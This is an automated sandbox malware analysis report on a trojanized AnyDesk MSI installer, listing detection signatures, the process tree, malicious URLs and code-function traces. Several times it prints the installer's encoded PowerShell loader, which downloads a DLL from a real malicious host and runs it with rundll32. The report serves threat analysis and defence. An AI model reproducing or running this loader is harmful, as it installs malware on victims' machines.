Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AnydeskSetup_26b30163.msi

Overview

General Information

Sample Name:AnydeskSetup_26b30163.msi
Analysis ID:787624
MD5:c4e9e9a06001c6197de2ea2fec3d2214
SHA1:369006350f6b4c43c7f51a90deb5e73a20156b55
SHA256:e4edb4cc8f35c7bab6e89774a279593d492714fce9865e53879f87d3704ad96c
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected MalDoc
System process connects to network (likely due to code injection or exploit)
Sigma detected: Execute DLL with spoofed extension
Antivirus detection for URL or domain
Malicious encrypted Powershell command line found
Multi AV Scanner detection for domain / URL
Encrypted powershell cmdline option found
Powershell drops PE file
Deletes itself after installation
Drops executables to the windows directory (C:\Windows) and starts them
Found decision node followed by non-executed suspicious APIs
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Contains functionality to retrieve information about pressed keystrokes
Launches processes in debugging mode, may be used to hinder debugging
Checks for available system drives (often done to infect USB drives)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to launch a program with higher privileges
Found evasive API chain (may stop execution after accessing registry keys)

Classification

  • System is w10x64
  • msiexec.exe (PID: 8 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\AnydeskSetup_26b30163.msi" MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 4312 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 1592 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 98DB8D4E6DAAAA17E94E76B65ACF188B MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • MSI5344.tmp (PID: 2904 cmdline: "C:\Windows\Installer\MSI5344.tmp" /DontWait /HideWindow powershell.exe -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA== MD5: 6AAC525CFCDD6D3978C451BBA2BB9CB3)
  • powershell.exe (PID: 4440 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA== MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • rundll32.exe (PID: 2088 cmdline: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 2460 cmdline: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • rundll32.exe (PID: 5176 cmdline: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2 MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 3720 cmdline: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • rundll32.exe (PID: 5064 cmdline: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2 MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 3584 cmdline: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
AnydeskSetup_26b30163.msiJoeSecurity_MalDocYara detected MalDocJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Windows\Installer\4641a8.msiJoeSecurity_MalDocYara detected MalDocJoe Security

      Data Obfuscation

      barindex
      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer , CommandLine: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer , CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA==, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4440, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer , ProcessId: 2088, ProcessName: rundll32.exe
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://download-cdn.com/download.php?f=Ldrp.dll&from=AnydeskSetup_26b30163.msiAvira URL Cloud: Label: malware
      Source: https://download-cdn.com/pload/26b30163Avira URL Cloud: Label: malware
      Source: http://download-cdn.comAvira URL Cloud: Label: malware
      Source: https://download-cdn.comAvira URL Cloud: Label: malware
      Source: https://download-cdn.com/pload/Avira URL Cloud: Label: malware
      Source: https://download-cdn.com/pload/SOFTWAREAvira URL Cloud: Label: malware
      Source: https://download-cdn.com/download.php?f=Ldrp.dAvira URL Cloud: Label: malware
      Source: download-cdn.comVirustotal: Detection: 14%Perma Link
      Source: 4.2.powershell.exe.11a11318758.0.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: unknownHTTPS traffic detected: 152.89.196.75:443 -> 192.168.2.4:49695 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 152.89.196.75:443 -> 192.168.2.4:49696 version: TLS 1.2
      Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdb> source: MSI5344.tmp, 00000003.00000000.334329335.00007FF7AF735000.00000002.00000001.01000000.00000003.sdmp, MSI5344.tmp, 00000003.00000002.336937187.00007FF7AF735000.00000002.00000001.01000000.00000003.sdmp, AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr
      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbb source: AnydeskSetup_26b30163.msi, 4641a8.msi.1.dr
      Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdb source: MSI5344.tmp, 00000003.00000000.334329335.00007FF7AF735000.00000002.00000001.01000000.00000003.sdmp, MSI5344.tmp, 00000003.00000002.336937187.00007FF7AF735000.00000002.00000001.01000000.00000003.sdmp, AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr
      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: AnydeskSetup_26b30163.msi, 4641a8.msi.1.dr
      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: AnydeskSetup_26b30163.msi, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.dr
      Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: c:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A07390 SHGetFolderPathW,RegOpenKeyExA,SHGetFolderPathW,lstrlenW,lstrlenW,lstrlenA,lstrlenA,lstrlenA,SHGetFolderPathW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,7_2_04A07390
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A07750 RegQueryValueExA,ExpandEnvironmentStringsW,lstrlenW,lstrcatW,FindFirstFileW,lstrcatA,lstrcatW,lstrcatW,GetFileAttributesW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcpyW,CreateProcessW,CloseHandle,CloseHandle,lstrcatA,lstrcatA,lstrlenW,lstrcatA,lstrcatW,lstrcatW,FindNextFileW,FindClose,7_2_04A07750
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A03AA0 GetFileAttributesW,lstrlenW,lstrcmpiW,lstrlenW,CreateDirectoryW,FindFirstFileW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,CopyFileW,SetFileAttributesW,FindNextFileW,lstrcatW,FindClose,7_2_04A03AA0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A03D50 lstrcpyW,lstrcpyW,lstrcpyW,FindFirstFileW,lstrcatW,lstrcatW,lstrcatW,CopyFileW,FindNextFileW,FindClose,7_2_04A03D50
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00FC7750 RegQueryValueExA,ExpandEnvironmentStringsW,lstrlenW,lstrcatW,FindFirstFileW,lstrcatA,lstrcatW,lstrcatW,GetFileAttributesW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcpyW,CreateProcessW,CloseHandle,CloseHandle,lstrcatA,lstrcatA,lstrlenW,lstrcatA,lstrcatW,lstrcatW,FindNextFileW,FindClose,9_2_00FC7750
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00FC3AA0 GetFileAttributesW,lstrlenW,lstrcmpiW,lstrlenW,CreateDirectoryW,FindFirstFileW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,CopyFileW,SetFileAttributesW,FindNextFileW,lstrcatW,FindClose,9_2_00FC3AA0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00FC7390 SHGetFolderPathW,RegOpenKeyExA,SHGetFolderPathW,lstrlenW,lstrlenW,lstrlenA,lstrlenA,lstrlenA,SHGetFolderPathW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,9_2_00FC7390
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00FC3D50 lstrcpyW,lstrcpyW,lstrcpyW,FindFirstFileW,lstrcatW,lstrcatW,lstrcatW,CopyFileW,FindNextFileW,FindClose,9_2_00FC3D50

      Networking